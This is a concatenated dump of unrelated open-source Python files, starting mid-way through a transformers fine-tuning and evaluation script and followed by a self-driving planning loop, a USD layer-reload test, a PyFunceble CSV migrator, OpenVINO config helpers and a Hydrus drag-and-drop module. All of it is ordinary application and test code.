epoch_iterator = progress_bar(train_dataloader, display=args.local_rank not in [-1, 0], parent=mb)
for step, batch in enumerate(epoch_iterator):
model.train()
batch = tuple(t.to(args.device) for t in batch)
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'labels': batch[3]}
if args.model_type != 'distilbert':
inputs['token_type_ids'] = batch[2] if args.model_type in ['bert', 'xlnet'] else None # XLM, DistilBERT and RoBERTa don't use segment_ids
outputs = model(**inputs)
loss = outputs[0] # model outputs are always tuple in transformers (see doc)
if args.n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu parallel training
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
tr_loss += loss.item()
if (step + 1) % args.gradient_accumulation_steps == 0 and not args.tpu:
if args.fp16:
torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), args.max_grad_norm)
else:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step() # Update learning rate schedule
model.zero_grad()
global_step += 1
if args.local_rank in [-1, 0] and args.logging_steps > 0 and global_step % args.logging_steps == 0:
# Log metrics
mb.child.comment = f"loss: {loss}"
tb_writer.add_scalar('train/lr', scheduler.get_lr()[0], global_step)
tb_writer.add_scalar('train/loss', (tr_loss - logging_loss)/args.logging_steps, global_step)
logging_loss = tr_loss
if args.local_rank in [-1, 0] and args.save_steps > 0 and global_step % args.save_steps == 0:
# Save model checkpoint
output_dir = os.path.join(args.output_dir, 'checkpoint-{}'.format(global_step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
model_to_save = model.module if hasattr(model, 'module') else model # Take care of distributed/parallel training
model_to_save.save_pretrained(output_dir)
torch.save(args, os.path.join(output_dir, 'training_args.bin'))
logger.info("Saving model checkpoint to %s", output_dir)
#mb.first_bar.comment = f'first bar stat'
#mb.write(f'Finished loop {i}.')
if args.tpu:
args.xla_model.optimizer_step(optimizer, barrier=True)
model.zero_grad()
global_step += 1
if args.max_steps > 0 and global_step > args.max_steps:
epoch_iterator.close()
break
if args.local_rank == -1 and args.evaluate_during_training: # Only evaluate when single GPU otherwise metrics may not average well
results = evaluate(args, model, valid_dataset)
for key, value in results.items():
tb_writer.add_scalar('eval/{}'.format(key), value, global_step)
mb.first_bar.comment = str(results['acc'])
mb.write(f"Epoch: {epoch} {loss} Accuracy: {results.get('acc', 0)}")
if args.max_steps > 0 and global_step > args.max_steps:
train_iterator.close()
break
hparams_dict = {k: v for k, v in dataclasses.asdict(args).items() if isinstance(v, (int, float, str, bool,))}
tb_writer.add_hparams(hparam_dict=hparams_dict, metric_dict=results)
if args.local_rank in [-1, 0]:
tb_writer.close()
return global_step, tr_loss / global_step
def evaluate(args, model, eval_dataset, prefix="", eval_output_dir="/tmp/out"):
# Loop to handle MNLI double evaluation (matched, mis-matched)
results = {}
eval_task = args.task_name
if not os.path.exists(eval_output_dir) and args.local_rank in [-1, 0]:
os.makedirs(eval_output_dir)
args.eval_batch_size = args.per_gpu_eval_batch_size * max(1, args.n_gpu)
# Note that DistributedSampler samples randomly
eval_sampler = SequentialSampler(eval_dataset) if args.local_rank == -1 else DistributedSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
# Eval!
logger.info("***** Running evaluation {} *****".format(prefix))
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
preds = None
out_label_ids = None
mb = progress_bar(eval_dataloader)
for batch in mb:
model.eval()
batch = tuple(t.to(args.device) for t in batch)
with torch.no_grad():
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'labels': batch[3]}
if args.model_type != 'distilbert':
inputs['token_type_ids'] = batch[2] if args.model_type in ['bert', 'xlnet'] else None # XLM, DistilBERT and RoBERTa don't use segment_ids
outputs = model(**inputs)
tmp_eval_loss, logits = outputs[:2]
eval_loss += tmp_eval_loss.mean().item()
nb_eval_steps += 1
if preds is None:
preds = logits.detach().cpu().numpy()
out_label_ids = inputs['labels'].detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
out_label_ids = np.append(out_label_ids, inputs['labels'].detach().cpu().numpy(), axis=0)
eval_loss = eval_loss / nb_eval_steps
if args.output_mode == "classification":
preds = np.argmax(preds, axis=1)
elif args.output_mode == "regression":
preds = np.squeeze(preds)
result = compute_metrics(eval_task, preds, out_label_ids)
results.update(result)
results['loss'] = eval_loss
output_eval_file = os.path.join(eval_output_dir, prefix, "eval_results.txt")
with open(output_eval_file, "w") as writer:
logger.info("***** Eval results {} *****".format(prefix))
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
return results
def prepare_glue_examples(tokenizer, task_name='mrpc', split_name='train'):
processor = glue_processors[task_name]()
def tf_mrpc_to_pytorch(d):
for ex in d:
ex = processor.get_example_from_tensor_dict(ex)
# ex = processor.tfds_map(ex)
yield ex
tf_data = tensorflow_datasets.load(f"glue/{task_name}")[split_name]
examples = tf_mrpc_to_pytorch(tf_data)
features = glue_convert_examples_to_features(examples,
tokenizer,
max_length=128,
task='mrpc')
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)
all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)
all_labels = torch.tensor([f.label for f in features], dtype=torch.long)
dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels)
return dataset
def strip_tensors(r):
nr = {}
for k,v in r.items():
v = v.numpy()
if isinstance(v, bytes):
v = v.decode("utf-8")
else:
v = v.item()
nr[k] = v
return nr
def glue_dataset_to_df(task_name):
data = tensorflow_datasets.load(f"glue/{task_name}")
new_dict = {}
for name, dataset in data.items():
new_dict[name] = pd.DataFrame.from_records([strip_tensors(r) for r in dataset],
columns=dataset.output_shapes.keys(),
index='idx')
return new_dict.get('train', None), new_dict.get('validation', None), new_dict.get('test', None)
def convert_df_to_examples(df, text_a='sentence1', text_b='sentence2', label='label'):
return [InputExample(
idx,
row[text_a],
row[text_b],
str(row[label]))
for idx, row in df.iterrows()]
def convert_df_to_dataset(tokenizer, df, max_length=128, task='mrpc', text_a='sentence1', text_b='sentence2', label='label', return_labels=False):
label_list = list(sorted(map(str, df[label].unique())))
examples = convert_df_to_examples(df, text_a, text_b, label)
features = glue_convert_examples_to_features(examples,
tokenizer,
max_length=max_length,
label_list=label_list,
output_mode='classification',
task=None)
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)
all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)
all_labels = torch.tensor([f.label for f in features], dtype=torch.long)
dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels)
if return_labels:
return dataset, label_list
return dataset
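# Usage sketch (illustrative; `train_df` is a hypothetical pandas DataFrame with
# 'text', 'cell_content' and 'label' columns, matching the defaults used by
# TransfoExperiment below):
#
#     tokenizer = AutoTokenizer.from_pretrained('bert-base-cased')
#     train_ds, label_list = convert_df_to_dataset(
#         tokenizer, train_df, text_a='text', text_b='cell_content',
#         label='label', return_labels=True)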
@dataclass
class TransfoLearner():
model: nn.Module
tokenizer: Any
data: Any
def get_preds(args, model, dataset, ordered=True):
eval_dataset = dataset
eval_sampler = SequentialSampler(eval_dataset) if args.local_rank == -1 else DistributedSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
if isinstance(eval_sampler, DistributedSampler) and ordered:
# Note that DistributedSampler samples randomly
raise ValueError("Unable to run distributed get_preds with ordered == True")
logger.info("Num examples = %d", len(eval_dataset))
logger.info("Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
mb = progress_bar(eval_dataloader)
preds = []
labels = []
try:
with torch.no_grad():
model.to(args.device)
model.eval()
for batch in mb:
batch = tuple(t.to(args.device) for t in batch)
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'labels': batch[3]}
if args.model_type != 'distilbert':
inputs['token_type_ids'] = batch[2] if args.model_type in ['bert', 'xlnet'] else None
# XLM, DistilBERT and RoBERTa don't use segment_ids
outputs = model(**inputs)
tmp_eval_loss, logits = outputs[:2]
eval_loss += tmp_eval_loss.mean().item()
nb_eval_steps += 1
preds.append(logits.detach().cpu())
                labels.append(inputs['labels'].detach().cpu()) # add non_blocking=True but somehow it isn't available in our torch
return torch.cat(preds, dim=0), torch.cat(labels, dim=0)
finally:
model.to("cpu")
@dataclass
class TransfoDatabunch():
num_labels: int
train_ds: Any
valid_ds: Any
test_ds: Any
@dataclass
class TransfoExperiment(Experiment):
test_split: str = None
valid_split: str = None
text_a: str = 'text'
text_b: str = 'cell_content'
label: str = 'label'
#@help("Model type selected in the list: ...")
model_type: str = None
#@help("Path to pre-trained model or shortcut name selected in the list: ...")
pretrained_name: str = None
#@help("The name of the task to train selected in the list: " + "".join(processors.keys()))
task_name: str = None
#@help("Pretrained config name or path if not the same as model_name")
config_name: str = ""
#@help("Pretrained tokenizer name or path if not the same as model_name")
tokenizer_name: str = ""
#@help("Where do you want to store the pre-trained models downloaded from s3")
cache_dir: str = ""
#@help("The maximum total input sequence length after tokenization. Sequences longer than this will be truncated sequences shorter will be padded.")
max_seq_length: int = 128
#@help("Whether to run training.")
do_train: bool = False
#@help("Whether to run eval on the dev set.")
do_eval: bool = False
#@help("Rul evaluation during training at each logging step.")
evaluate_during_training: bool = False
#@help("Batch size per GPU/CPU for training.")
per_gpu_train_batch_size: int = 8
#@help("Batch size per GPU/CPU for evaluation.")
per_gpu_eval_batch_size: int = 8
#@help("Number of updates steps to accumulate before performing a backward/update pass.")
gradient_accumulation_steps: int = 1
#@help("The initial learning rate for Adam.")
learning_rate: float = 5e-5
#@help("Weight deay if we apply some.")
weight_decay: float = 0.0
#@help("Epsilon for Adam optimizer.")
adam_epsilon: float = 1e-8
#@help("Max gradient norm.")
max_grad_norm: float = 1.0
#@help("Total number of training epochs to perform.")
num_train_epochs: float = 3.0
#@help("If > 0: set total number of training steps to perform. Override num_train_epochs.")
max_steps: int = -1
#@help("Linear warmup over warmup_steps.")
warmup_steps: int = 0
#@help("Log every X updates steps.")
logging_steps: int = 10
#@help("Save checkpoint every X updates steps.")
save_steps: int = 50
#@help("Evaluate all checkpoints starting with the same prefix as model_name ending and ending with step number")
eval_all_checkpoints: bool = False
#@help("Avoid using CUDA when available")
no_cuda: bool = False
#@help("Overwrite the cached training and evaluation sets")
overwrite_cache: bool = False
#@help("random seed for initialization")
seed: int = 42
#@help("Whether to run on the TPU defined in the environment variables")
tpu: bool = False
#@help("TPU IP address if none are set in the environment variables")
tpu_ip_address: str = ''
#@help("TPU name if none are set in the environment variables")
tpu_name: str = ''
#@help("XRT TPU config if none are set in the environment variables")
xrt_tpu_config: str = ''
#@help("Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit")
fp16: bool = False
#@help("For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2' and 'O3']. See details at https://nvidia.github.io/apex/amp.html")
fp16_opt_level: str = 'O1'
#@help("For distributed training: local_rank")
local_rank: int = -1
#@help("For distant debugging.")
server_ip: str = ''
#@help("For distant debugging.")
server_port: str = ''
seed: int = 42
# Unused
#@help("The input data dir. Should contain the .tsv files (or other data files) for the task.")
data_dir: str = "/tmp/data"
#@help("The output directory where the model predictions and checkpoints will be written.")
output_dir: str = "/tmp/tmp_output_dir"
#@help("Overwrite the content of the output directory")
overwrite_output_dir: bool = True
def __post_init__(self):
if os.path.exists(self.output_dir) and os.listdir(
self.output_dir) and self.do_train and not self.overwrite_output_dir:
raise ValueError(
"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir to overcome.".format(
self.output_dir))
# Setup distant debugging if needed
if self.server_ip and self.server_port:
# Distant debugging - see https://code.visualstudio.com/docs/python/debugging#_attach-to-a-local-script
import ptvsd
print("Waiting for debugger attach")
ptvsd.enable_attach(address=(self.server_ip, self.server_port), redirect_output=True)
ptvsd.wait_for_attach()
# Setup CUDA, GPU & distributed training
if self.local_rank == -1 or self.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not self.no_cuda else "cpu")
self.n_gpu = torch.cuda.device_count()
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(self.local_rank)
device = torch.device("cuda", self.local_rank)
torch.distributed.init_process_group(backend='nccl')
self.n_gpu = 1
self.device = device
self.output_mode = "classification"
self.train_batch_size = self.per_gpu_train_batch_size * max(1, self.n_gpu)
self.eval_batch_size = self.per_gpu_eval_batch_size * max(1, self.n_gpu)
self._tokenizer = None
self._model = None
self._data_cache = None
self.train_started = None
@property
def tokenizer(self):
if self._tokenizer is None:
self._tokenizer = AutoTokenizer.from_pretrained(self.pretrained_name)
return self._tokenizer
@property
def experiment_name(self):
from datetime import datetime
import socket
if not self.name:
now = datetime.now()
d = now.strftime("%y%m%d_%H%M%S")
h = "_".join(socket.gethostname().split('-'))
def short_name(name):
return "".join([p[0] for p in name.split('_')])
def short_val(val):
if isinstance(val, bool):
return int(val)
return val
relevant_params = {k: v for k, v in dataclasses.asdict(self).items()
if not k.startswith('_') and hasattr(TransfoExperiment, k) and getattr(TransfoExperiment,
k) != v}
params = [f"{short_name(k)}_{v}" for k, v in relevant_params.items() if not isinstance(v, bool)]
bool_flags = [f"{short_name(k)}" for k, v in relevant_params.items() if isinstance(v, bool) and v]
params_str = ".".join(params + bool_flags)
self.name = f"{d}.{h}.{params_str}"
return self.name
def get_summary_writer(self):
return SummaryWriter("runs/"+self.experiment_name)
def _save_predictions(self, path):
self._dump_pickle([self._preds, self._phases], path)
def _load_predictions(self, path):
self._preds, self._phases = self._load_pickle(path)
return self._preds
def load_predictions(self):
path = self._path.parent / f"{self._path.stem}.preds"
return self._load_predictions(path)
# todo: make it compatible with Experiment
def get_trained_model(self, data: TransfoDatabunch):
self._model = self.train_model(data)
self.has_model = True
return self._model
def get_glue_databunch(self):
return TransfoDatabunch(
train_ds = prepare_glue_examples(self.tokenizer, self.task_name, 'train'),
valid_ds = prepare_glue_examples(self.tokenizer, self.task_name, 'validation'),
test_ds = None
)
def get_databunch(self, train_df, valid_df, test_df):
data_key = (id(train_df), id(valid_df), id(test_df))
if self._data_cache is not None and self._data_cache.key != data_key:
self._data_cache = None
self.tokenizer.max_len = 999999
if self._data_cache is None:
common_args = dict(text_a=self.text_a, text_b=self.text_b, label=self.label)
train_ds, label_list = convert_df_to_dataset(self.tokenizer, train_df, return_labels=True, **common_args)
data = TransfoDatabunch(
num_labels=len(label_list),
train_ds=train_ds,
valid_ds=convert_df_to_dataset(self.tokenizer, valid_df, **common_args),
test_ds=convert_df_to_dataset(self.tokenizer, test_df, **common_args)
)
data.key = data_key
self._data_cache = data
return self._data_cache
def new_experiment(self, **kwargs):
#kwargs.setdefault("has_predictions", False)
return super().new_experiment(**kwargs)
def _add_phase(self, state):
del state['opt']
del state['train_dl']
self._phases.append(state)
def set_seed(self, name):
return set_seed(self.seed, name, all_gpus=(self.n_gpu > 1))
# todo: make it compatible with Experiment
def train_model(self, data: TransfoDatabunch):
self.set_seed("class")
self.train_started = time.time()
num_labels = data.num_labels
config = AutoConfig.from_pretrained(self.pretrained_name, num_labels=num_labels) #, finetuning_task=args.task_name
model = AutoModelForSequenceClassification.from_pretrained(self.pretrained_name, config=config)
train(self, data.train_ds, data.valid_ds, model.to(self.device), self._tokenizer)
model.to("cpu")
return model
def _save_model(self, path):
        # Take care of distributed/parallel training
        model_to_save = self._model.module if hasattr(self._model, 'module') else self._model
model_to_save.save_pretrained(path)
logger.info("Saving model checkpoint to %s", path)
# todo: move to Experiment
def save(self, dir_path):
dir_path = Path(dir_path)
dir_path.mkdir(exist_ok=True, parents=True)
filename = self._get_next_exp_name(dir_path)
j = dataclasses.asdict(self)
with open(filename, "wt") as f:
json.dump(j, f)
self._save_model(dir_path / f"{filename.stem}.model")
if hasattr(self, "_preds"):
self._save_predictions(dir_path / f"{filename.stem}.preds")
return filename.name
def evaluate_transformers(self, data):
return evaluate(self, self._model.to(self.device), data.valid_ds, prefix="")
def evaluate(self, model, train_df, valid_df, test_df):
data = self.get_databunch(train_df, valid_df, test_df)
valid_probs = get_preds(self, model, data.valid_ds, ordered=True)[0].cpu().numpy()
test_probs = get_preds(self, model, data.test_ds, ordered=True)[0].cpu().numpy()
train_probs = get_preds(self, model, data.train_ds, ordered=True)[0].cpu().numpy()
self._preds = []
for prefix, tdf, probs in zip(["train", "valid", "test"],
[train_df, valid_df, test_df],
[train_probs, valid_probs, test_probs]):
preds = np.argmax(probs, axis=1)
if self.merge_fragments and self.merge_type != "concat":
if self.merge_type == "vote_maj":
vote_results = preds_for_cell_content(tdf, probs)
elif self.merge_type == "vote_avg":
vote_results = preds_for_cell_content_multi(tdf, probs)
elif self.merge_type == "vote_max":
vote_results = preds_for_cell_content_max(tdf, probs)
preds = vote_results["pred"]
true_y = vote_results["true"]
else:
true_y = tdf["label"]
print(true_y.shape)
self._set_results(prefix, preds, true_y)
self._preds.append(probs)
# # schedule: Tuple = (
# # (1, 1e-2), # (a,b) -> fit_one_cyclce(a, b)
# # (1, 5e-3/2., 5e-3), # (a, b) -> freeze_to(-2); fit_one_cycle(a, b)
# # (8, 2e-3/100, 2e-3) # (a, b) -> unfreeze(); fit_one_cyccle(a, b)
# # )
# # # drop_mult: float = 0.75
# # fp16: bool = False
# pretrained_lm: str = "bert_base_cased"
# # dataset: str = None
# # train_on_easy: bool = True
# # BS: int = 64
# #
# # has_predictions: bool = False # similar to has_model, but to avoid storing pretrained models we only keep predictions
# # # that can be later used by CRF
class MnliProcessor(DataProcessor):
"""Processor for the MultiNLI data set (GLUE version)."""
def get_example_from_tensor_dict(self, tensor_dict):
"""See base class."""
return InputExample(tensor_dict['idx'].numpy(),
tensor_dict['premise'].numpy().decode('utf-8'),
tensor_dict['hypothesis'].numpy().decode('utf-8'),
str(tensor_dict['label'].numpy()))
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "dev_matched.tsv")),
"dev_matched")
def get_labels(self):
"""See base class."""
return ["contradiction", "entailment", "neutral"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = "%s-%s" % (set_type, line[0])
text_a = line[8]
text_b = line[9]
label = line[-1]
examples.append(
InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return examples
|
pilot/planning/mp_planning.py | yanbarurobotics/PythonPilot | 129 | 12745723 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import multiprocessing
import numpy as np
import time
from common.pilot_gloval_variable import MPVariable
from planning import pure_pursuit
class MPPlanning():
def __init__(self, cfg):
self.__m = multiprocessing.Process(target=self.__process, \
args=(cfg['planning_interval'],))
self.__m.start()
return
def end(self):
self.__m.join()
print('Finish MPPerception')
return
def __process(self, interval):
"""
update planning
"""
try:
            previous_work_time = time.time()
while True:
now_time = time.time()
                if (now_time - previous_work_time) >= interval:
# calc target angle
target_z, \
target_angle = pure_pursuit.pure_pursuit(MPVariable.lane_m_leasts_abc_lpf_a.value, \
MPVariable.lane_m_leasts_abc_lpf_b.value, \
MPVariable.lane_m_leasts_abc_lpf_c.value, \
MPVariable.obd_vehicle_speed_kmph.value)
# tx update
MPVariable.pp_target_z.value = target_z
MPVariable.can_tx_target_angle.value = target_angle
MPVariable.can_tx_servo_on_flag.value = MPVariable.lane_m_leasts_status.value
MPVariable.can_tx_counter_camera_unit.value = MPVariable.can_rx_counter_servo_unit.value
                    previous_work_time = now_time
except KeyboardInterrupt:
pass
except Exception as e:
import traceback
traceback.print_exc()
finally:
pass
return
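# Illustrative usage sketch (not part of the original module); the config key comes
# from the constructor above, the interval value is hypothetical.
#
#   cfg = {'planning_interval': 0.02}
#   planner = MPPlanning(cfg)   # spawns the planning process
#   ...                         # the vehicle loop exchanges state via MPVariable
#   planner.end()               # joins the process on shutdown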
|
dizoo/procgen/maze/entry/__init__.py | sailxjx/DI-engine | 464 | 12745731 | from .maze_ppo_config import main_config, create_config
from .maze_dqn_config import main_config, create_config |
pxr/usd/pcp/testenv/testPcpStreamingLayerReload.py | stephenp24/USD | 3,680 | 12745742 | #!/pxrpythonsubst
#
# Copyright 2021 Pixar
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
from __future__ import print_function
from pxr import Sdf, Pcp, Plug, Vt
import os, unittest
class TestPcpStreamingLayerReload(unittest.TestCase):
@classmethod
def setUpClass(cls):
testRoot = os.path.join(os.path.dirname(__file__), 'PcpPlugins')
testPluginsDso = testRoot + '/lib'
testPluginsDsoSearch = testPluginsDso + '/*/Resources/'
# Register dso plugins. Discard possible exception due to
# TestPlugDsoEmpty. The exception only shows up here if it happens in
# the main thread so we can't rely on it.
try:
Plug.Registry().RegisterPlugins(testPluginsDsoSearch)
except RuntimeError:
pass
def setUp(self):
# We expect there to be no layers left loaded when we start each test
# case so we can start fresh. By the tearDown completes this needs to
# be true.
self.assertFalse(Sdf.Layer.GetLoadedLayers())
def _CreatePcpCache(self, rootLayer):
return Pcp.Cache(Pcp.LayerStackIdentifier(rootLayer))
def test_StreamingLayerReload(self):
# Open a layer with our streaming format.
l = Sdf.Layer.FindOrOpen('root.testpcpstreaminglayerreload')
self.assertTrue(l)
# Build a cache.
cache = self._CreatePcpCache(l)
# Attempt to compute an index for /torus1/mesh_0 (should not exist).
primIndex, errors = cache.ComputePrimIndex('/torus1/mesh_0')
self.assertEqual(primIndex.primStack, [])
# Load up asset.sdf, and replace l's content with it. This only changes
# the sublayer list, which pcp should recognize and blow layer stacks.
# Since l's underlying data implementation returns true for
# "StreamsData()" this exercises a different code-path in Pcp's change
# processing.
assetLayer = Sdf.Layer.FindOrOpen('asset.sdf')
self.assertTrue(assetLayer)
with Pcp._TestChangeProcessor(cache):
l.TransferContent(assetLayer)
# Now when we compute the index for the mesh, it should have a spec, due
# to the added sublayer.
primIndex, errors = cache.ComputePrimIndex('/torus1/mesh_0')
self.assertTrue(len(primIndex.primStack) > 0)
if __name__ == "__main__":
unittest.main()
|
PyFunceble/cli/migrators/csv_file/base.py | Centaurioun/PyFunceble | 213 | 12745746 | """
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Provides the base of all CSV file-s migrators.
Author:
<NAME>, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/#/special-thanks
Contributors:
https://pyfunceble.github.io/#/contributors
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import csv
import functools
import tempfile
from typing import List, Optional
import PyFunceble.facility
from PyFunceble.cli.migrators.base import MigratorBase
from PyFunceble.cli.utils.stdout import print_single_line
from PyFunceble.helpers.file import FileHelper
class CSVFileMigratorBase(MigratorBase):
"""
Provides the base of all CSV file migrator classes.
"""
source_file: Optional[str] = None
FIELDS: Optional[List[str]] = None
TO_DELETE: Optional[List[str]] = None
def ensure_source_file_is_given(func): # pylint: disable=no-self-argument
"""
Ensures that the source file is given before launching the decorated
method.
:raise RuntimeError:
            When the :code:`self.source_file` is not given.
"""
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
if not isinstance(self.source_file, str):
raise RuntimeError("<self.source_file> is not given.")
return func(self, *args, **kwargs) # pylint: disable=not-callable
return wrapper
@ensure_source_file_is_given
def migrate(self) -> "MigratorBase":
"""
Provides the migrator (itself).
"""
file_helper = FileHelper(self.source_file)
if file_helper.exists():
with file_helper.open("r", encoding="utf-8") as file_stream:
first_line = next(file_stream)
if any(x in first_line for x in self.TO_DELETE):
temp_destination = tempfile.NamedTemporaryFile(
"a+", newline="", encoding="utf-8", delete=False
)
file_handler = file_helper.open(newline="")
reader = csv.DictReader(file_handler)
writer = csv.DictWriter(
temp_destination,
fieldnames=[x for x in self.FIELDS if x not in self.TO_DELETE],
)
writer.writeheader()
keys_found = False
for row in reader:
row = dict(row)
for key in self.TO_DELETE:
if key in row:
del row[key]
keys_found = True
if not keys_found:
break
writer.writerow(row)
if self.print_action_to_stdout:
print_single_line()
temp_destination.seek(0)
FileHelper(temp_destination.name).move(self.source_file)
self.done = True
def start(self) -> "MigratorBase":
"""
Starts the migration and everything related to it.
"""
PyFunceble.facility.Logger.info("Started migration.")
self.migrate()
PyFunceble.facility.Logger.info("Finished migration.")
return self
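# Illustrative subclass sketch (not part of PyFunceble); the file name, column names
# and the no-argument construction below are assumptions that only show how the
# FIELDS / TO_DELETE contract is meant to be filled in.
#
#   class ExampleColumnDropMigrator(CSVFileMigratorBase):
#       source_file = "example.csv"
#       FIELDS = ["subject", "status", "obsolete_column"]
#       TO_DELETE = ["obsolete_column"]
#
#   ExampleColumnDropMigrator().start()  # rewrites example.csv without the dropped column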
|
tools/pot/openvino/tools/pot/configs/utils.py | pazamelin/openvino | 2,406 | 12745752 | <filename>tools/pot/openvino/tools/pot/configs/utils.py<gh_stars>1000+
# Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import itertools
from ..utils.logger import get_logger
logger = get_logger(__name__)
def product_dict(d):
keys = d.keys()
vals = d.values()
for instance in itertools.product(*vals):
yield dict(zip(keys, instance))
def check_params(algo_name, config, supported_params):
""" Check algorithm parameters in config
:param algo_name: name of algorithm
:param config: config with parameters to check
:param supported_params: parameters supported by algorithm
"""
for key, value in config.items():
if key not in supported_params:
raise RuntimeError('Algorithm {}. Unknown parameter: {}'.format(algo_name, key))
if isinstance(value, dict):
if isinstance(supported_params[key], dict):
check_params(algo_name, value, supported_params[key])
else:
raise RuntimeError('Algorithm {}. Wrong structure for parameter: {}'.format(algo_name, key))
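

# Minimal self-check sketch (not part of the original module); the algorithm name and
# parameter names below are made up purely to exercise the two helpers above.
# Run via `python -m` so the relative imports at the top of the file resolve.
if __name__ == '__main__':
    # product_dict expands {'a': [1, 2], 'b': [3]} into one dict per combination.
    assert list(product_dict({'a': [1, 2], 'b': [3]})) == [{'a': 1, 'b': 3}, {'a': 2, 'b': 3}]

    supported = {'preset': None, 'stat_subset_size': None, 'bias_correction': {'apply': None}}
    # A valid (possibly nested) config passes silently.
    check_params('DemoQuantization', {'preset': 'performance', 'bias_correction': {'apply': True}}, supported)
    try:
        check_params('DemoQuantization', {'unknown_param': 1}, supported)
    except RuntimeError as err:
        print(err)  # Algorithm DemoQuantization. Unknown parameter: unknown_param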
|
hydrus/client/gui/ClientGUIDragDrop.py | thatfuckingbird/hydrus-websocket-server | 1,417 | 12745758 | import os
from qtpy import QtCore as QC
from qtpy import QtGui as QG
from qtpy import QtWidgets as QW
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusGlobals as HG
from hydrus.core import HydrusPaths
from hydrus.core import HydrusText
from hydrus.client import ClientExporting
from hydrus.client.gui import ClientGUIFunctions
from hydrus.client.gui import QtPorting as QP
# we do this because some programs like discord will disallow exports with additional custom mimetypes (like 'application/hydrus-files')
# as this is only ever an internal transfer, and as the python mimedata object is preserved through the dnd, we can just tack this info on with a subclass and python variables
class QMimeDataHydrusFiles( QC.QMimeData ):
def __init__( self ):
QC.QMimeData.__init__( self )
self._hydrus_files = None
def hydrusFiles( self ):
return self._hydrus_files
def setHydrusFiles( self, page_key, hashes ):
self._hydrus_files = ( page_key, hashes )
def DoFileExportDragDrop( window, page_key, media, alt_down ):
drop_source = QG.QDrag( window )
